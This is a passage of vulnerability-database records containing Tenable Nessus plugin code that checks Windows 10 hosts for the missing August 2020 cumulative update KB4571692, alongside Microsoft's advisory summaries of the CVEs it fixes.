script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571694'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n 
smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571694])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:27", "description": "The remote Windows host is missing security update 4571692.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. 
(CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. 
The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. 
(CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
(CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571692: Windows 10 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1556", "CVE-2020-1557", 
"CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571692.NASL", "href": "https://www.tenable.com/plugins/nessus/139487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139487);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1551\",\n 
\"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571692\");\n script_xref(name:\"MSFT\", value:\"MS20-4571692\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571692: Windows 10 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571692.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. 
A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 
(CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571692/windows-10-update-kb4571692\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?481aa152\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571692.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
